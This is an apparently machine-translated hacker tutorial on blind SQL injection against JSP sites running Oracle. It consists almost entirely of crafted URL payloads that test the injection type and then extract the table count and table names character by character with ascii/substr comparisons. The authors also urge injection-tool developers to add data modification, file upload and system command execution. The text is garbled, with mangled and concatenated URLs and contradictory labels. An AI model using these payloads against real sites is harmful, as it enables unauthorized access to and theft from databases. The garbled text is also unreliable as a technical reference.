JSP + ORACLE injection methods v1.0

Hello everyone, we are pt007 and solaris7, QQ: 7491805/564935. Welcome to come and talk with experts :).
First of all, I would like to thank Hua Zi and his friend Hotkey for developing the cnsafersi injection tool for everyone. Without this tool, I will not have this article, HEHE, this article analyzes and sorts out the data obtained after the cnsafersi injection tool captures the packets. The article is written in a rush. If you have any shortcomings, please let us know. In addition, we hope that experts can develop JSP injection programs with more powerful functions. Currently, cnsafersi only has the select function, we recommend that you add insert/delete/update/backup/upload/execute system commands to the new JSP injection tool. You can refer to the NBSI function for development. Reference: How to Develop CnSaferSI.

First, we will introduce the JSP injection tool used in this article: cnsafersi developed by Hua Zi and his friend Hotkey. I will write a detailed tutorial on how to use it in the near future:

 

The following uses the AD table as an example to illustrate the JSP + ORACLE injection process:

1. Determine the injection type (numeric or numeric)
Typical and digital data judgment: (I hope someone can further refine the judgment, which is divided into two parts: Digital and numeric)
Http://www.test.net/index_kaoyan_view.jsp? Id = 117And user> char (0)
Http://www.test.net/index_kaoyan_view.jsp? Id = 117And user Http://www.test.net/index_kaoyan_view.jsp? Id = 117And user> char (0) And 1 = 1
Http://www.test.net/index_kaoyan_view.jsp? Id = 117And user Http://www.test.net/index_kaoyan_view.jsp? Id = 117) And user> char (0) And () = (
Http://www.test.net/index_kaoyan_view.jsp? Id = 117) And user Http://www.test.net/index_kaoyan_view.jsp? Id = 117And str (98)> str (97)
Http://www.test.net/index_kaoyan_view.jsp? Id = 117And str (98)

Http://www.test.net/index_kaoyan_view.jsp? Id = 117And str (98)> str (97) And 1 = 1
Http://www.test.net/index_kaoyan_view.jsp? Id = 117And str (98) Http://www.test.net/index_kaoyan_view.jsp? Id = 117And str (98) Http://www.test.net/index_kaoyan_view.jsp? Id = 117) And str (98)> str (97) And () = (
Http://www.test.net/index_kaoyan_view.jsp? Id = 117) And str (98)

A normal page appears:
Http://www.test.net/index_kaoyan_view.jsp? Id = 117And USER> CHR (0)
Http://www.test.net/index_kaoyan_view.jsp? Id = 117And USER

2. Number of tables to be guessed and table name

The number of databases is 3:
Jsp? Id = 117 ">Http://www.test.net/index_kaoyan_view.jsp? Id = 117And 0 <= nvl (length (select count (*) FROM USER_TABLES), 0)

Http://www.test.net/index_kaoyan_view.jsp? Id = 117And 1> = nvl (length (select count (*) FROM USER_TABLES), 0)

Http://www.test.net/index_kaoyan_view.jsp? Id = 117And 2 <= nvl (length (select count (*) FROM USER_TABLES), 0)

Http://www.test.net/index_kaoyan_view.jsp? Id = 117And 4> = nvl (length (select count (*) FROM USER_TABLES), 0)

Http://www.test.net/index_kaoyan_view.jsp? Id = 117And 3 = nvl (length (select count (*) FROM USER_TABLES), 0)

Http://www.test.net/index_kaoyan_view.jsp? Id = 117And UNISTR (1)> UNISTR (0)

Number of data tables to be guessed
Data Table first: 1

Http://www.test.net/index_kaoyan_view.jsp? Id = 117And 52 = ascii (substr (select count (*) FROM USER_TABLES), 1, 1 ))
Http://www.test.net/index_kaoyan_view.jsp? Id = 117And 52> ascii (substr (select count (*) FROM USER_TABLES), 1, 1 ))

Http://www.test.net/index_kaoyan_view.jsp? Id = 117And 49 = ascii (substr (select count (*) FROM USER_TABLES), 1, 1 ))

The second digit of the data table is 3.
Http://www.test.net/index_kaoyan_view.jsp? Id = 117And 49 = ascii (substr (select count (*) FROM USER_TABLES), 2, 1 ))

Http://www.test.net/index_kaoyan_view.jsp? Id = 117And 95 = ascii (substr (select count (*) FROM USER_TABLES), 2, 1 ))

Http://www.test.net/index_kaoyan_view.jsp? Id = 117And 77 = ascii (substr (select count (*) FROM USER_TABLES), 2, 1 ))